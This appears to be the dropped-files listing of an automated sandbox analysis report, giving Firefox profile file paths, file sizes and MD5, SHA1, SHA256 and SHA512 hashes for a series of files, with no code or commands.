C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize: 1KB
MD5: 7f70e9b9fe92261454af7d81cb545964
SHA1: 4d8d4d38ea59684a75e6d553bee947dda7ee7135
SHA256: 2b1074a906af684873af64e7e33c5dcf6e85f46bb4e0abc85deee1b3f3ab75d7
SHA512: 0ad71eed591a7a4c931e7b59927535a8be7acd575d339e2f0004df8185aa6972e50bc4e5a6ce162a4ac6553da31c958f40a160ef9c68b6e38c535d6ba1fb5520

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize: 1KB
MD5: 903e376321851194a29d2f95605b3e36
SHA1: 16920f96622351d9467da80b69b0419c2114b659
SHA256: a9fffed6fb504c4d6b823db6eaea6e5ff0af2d800e322262dd7dbe38ba475a52
SHA512: 9ee198b3b99ecaca6a64e2778cca5456f4961d06e34eb7c9ecea76bde08d1372582dcf08782c5acb7b95bb69fee1d8a24816d162883634e0aca162176d575b96

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize: 2KB
MD5: cc4c9a12101371d0066037eba5572fe0
SHA1: 7bf11621f9a84b842e0f3f478893ccc453111341
SHA256: 7618df967ee8aa32374862afc65bd2d74c7ef62110383667ebb80bd58a8eee2c
SHA512: c0ce2ebda67bd0a2b04d4ef7f028ed136f134fee8a10321b72929cc810fdb1a7ae5b99e111f096686c327c976e39ae2db453fe61afba63bb98540a2bbb438458

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize: 2KB
MD5: 8e6acc1aeedaacea13b4dcaadf8679de
SHA1: a27836514902b51e84975852602760d0ffec8edb
SHA256: 21274aba9537d0efd22137f7f3ce8afb68d17f2de9fa6aba71531288105efc7f
SHA512: 41ee212991c712adf739ce07f32a31a2ade013e6d8df354c80ea92bc31b4e554adfeb165909d9af58b6e821220529a61fb665cea9543baf9aa4dbb740a40e60b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\sessionstore-backups\recovery.baklz4
Filesize: 2KB
MD5: c59432a279e4cb43c8b84f0664f908eb
SHA1: 30403fe50dfc3bf46920ef18d70e5ae4d4a6ea3e
SHA256: 9c8812097808bdd354c598bec09d1c55c90cb5530016440404115600618895f8
SHA512: ed177901acfc6e2d39ae06d54999bb4b8a0fc1e8007ce452a39fe685f49270b8b81c06a8a937d8fd728cb1b1f58df4b6578ea4dec6f6723b04e12d85da11560a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize: 5.6MB
MD5: 4aa4eec31e624db1ea98463a929efa80
SHA1: 4749fb1ef3c7c7345d8e8b837ff8416b07d29d5e
SHA256: 90099aedad451eaf6c008001f85085964cc69725c428aabef659216e8d203b0f
SHA512: 2ca58ab0cb4ccb8ce1a584b0a86c308f1b0b0e14f9a99e7443651be38a5a974cb1529c493110cc8c1ada42171b37ba01f9ba4738cca50a057de1004bd03dd757

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize: 5.6MB
MD5: b06cea7f936ca508a33aff885ee16abc
SHA1: 96683e73295929c516dee2fc2a431cd6d9653584
SHA256: eda0661c9fab0897d460709c54a50b575de8f236c92e6734c3470c4298f13c4c
SHA512: 447083248aaa6a64f8eddd88d5330b364538c5dd2eea6cbaf550556b564a5e5a3cf45a7840bd5901609d30baeeb416e54e0cbd2af278cf18319e82b66725cc95

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize: 9.3MB
MD5: 593566fa95ec47bb136c1e8509361eba
SHA1: ac9cf432271806d0a23f84e4d0a9d824e6e06689
SHA256: 142e82b8864aaaef8800f20df7c209f9410d7a91464e55af7aaa515e6d387b1e
SHA512: 57d5b8e8b8939a10697f60e88d19cce33c05a78b13fae62aac66e243e6914c75b6d2f940e47e000ff60f2642d91f1ec40f4fa180e8293b052f2024f9823dcfe5

Filesize: 33.5MB
MD5: 44a687ff5f4954f86d0a911cec843437
SHA1: c0379b53e62c3aa490435ebec901442cf637d0e7
SHA256: 873b3f4e9bcdf5c69e3928012df2b4d5fb94cb964f89ba842bdeb575178e031b
SHA512: 9b352b9ba5c0daec9dde3d73d1c13188e19af6590b15f66fcde0337dd1e7a4b8f14913239b1706c057cd0aad91c7b67c8396fb7d28012fb28b13e21585a703a8

Filesize: 6.1MB
MD5: 73c7cc676ab19d426f2745ef261d6349
SHA1: f217a78eb2beddcbf5bb00c229a96f9ffaa98a0d
SHA256: 4a513270a4d7e85bdc8dfe9adea3b190cfc055e562060c2be9389336333864a0
SHA512: 40f69adef5b8de42283ff0539cf0f0259ed9d23baa4e87c63e594fe12ca7f35e73dc3a0d6a66dd13a584d0e1569940026bc49d41f95a1f23c0c3fd810613ad36

Filesize: 12.5MB
MD5: 0ba40688b6a23948b2bd929dd2777a59
SHA1: bc109471bb84c7dc05ee6b1b63eae36c0e6ab209
SHA256: 4e3eca4adbe0c4fede28228239dd93bb866ecd0415569ede6464d796e8d1a3a8
SHA512: 104b2e48779d9e1f534ceb546f911e535eda1b2645f494313df661aceca41c134d3a10b3e97a00ddf4a40556421369fff3872e466357743bc21ea19e0b0c2156

Filesize: 116KB
MD5: ba5cf8079fa68d90a2e6497d3c5711c1
SHA1: 66b3c641ccd9a04ebf35ea868548bf58de295a11
SHA256: ae22254e2b5c5557f35a170696d53e847018221dcd4cc70c153c36ecdd891f81
SHA512: 8537604678bed001aca037d94c80d8d1dd3da3d5bf806fa687f44a093cb07a316dcef084b572b4fd9b3cd2d93fedc7db66a817b27f395a772f3b844509c30156

Filesize: 134KB
MD5: f2e401ec1c85ba69b28cca6e814afe3c
SHA1: 9d7d78e98fae9c22a2ff4a938672c3fe37589738
SHA256: b9b868f703ccb61ec15d14dcc738c4a4eebcc59c2f827090e7ced2f91c9debd7
SHA512: 605f0fa4d301519b07bb542ec215e9fa1d7426129c1b8a8de56e5418c3e64867d1f54ece273ff070b8ca4c5bf39dbdebbdddd83d6be6e701bb160b95b4597be1

Filesize: 49KB
MD5: b388b7f74802614467a17854b4bf75ff
SHA1: 0ec7a95503e27ee4735e0c4a7051125ece957ab1
SHA256: da4996a4d6b9e18c3ebce85b5fbd5666950e69e5d0e31afa2eef550c2671bd93
SHA512: 7c45a583cacf798b36fc6241397536ecb2eb9a846531fa8906c5c93e0680151ab9cf448bfb5a229c38fac8d4b83cdb044f05b95bada5a047e4acbcbc64c4d0d8

Filesize: 74KB
MD5: d31259e39bc2690a34448601e0bf105f
SHA1: e5339404e51f56cc0349b250adb7e61dd4b22476
SHA256: c94f3302b33c45a35ba83448c111dd0138a49d6355c943af0ea40bc8014a991b
SHA512: 79261bf57bc098d9c0e5f3cfa6acc2c353bc830fc7ae7201e13f3de54e4e584e5b1b5dfb4193818863cd36759b9c07d431b09f6ac74f6765827c4a2d47115541

Filesize: 675KB
MD5: 5eb3264c300a0a0a45f22305cff49596
SHA1: 06ef49a2d145dc98dbd5eea42b1de53b7039b5c4
SHA256: 9aa4d1356beedaad8f8879b49b76d1ff120dec210a1c0135ede8b9337ad0505d
SHA512: a2735a950d3505a7c835e78ed245cbdbff3821d5c9c4ac24b933ee143eab9b95d55ab6cff3bba16229f372077d7cfe2aac9785149ab70e742ed177872cde6ba0

Filesize: 197KB
MD5: ee63a5f831a47c40b38534b078742e53
SHA1: e8320fd97b77e717255ad3732d2c677de77405bd
SHA256: 28f086ae4965dd262e000783a4fd8aebdce8eeeef8285db59984144e7a4c45d4
SHA512: 7b051a6957723bf1413e6ccb29c688d10eb7f87553cdf5bc8d876ed3f3b6cd5e9bcbeabb151acb36e483587aafaf5ce43d80e2995153b3bcfc14ac9ef3e38726

Filesize: 88KB
MD5: 14fdb628e0b51f26a7bc3f59ec6e33f2
SHA1: 05deb1793e0a51fd79de99b6738a93cc959522fd
SHA256: 0fba4f6adcecbf2082ce52ebd6e7f07f7959b02ae401828aa640154933de40fe
SHA512: 28fd35174a70636c367c85116a268dc178546d6f6e632b82b7bd164877555057d31eeec76e1be91e82ce02ce04b6a33f704022d2b31a7066d4b6cb70cd798d90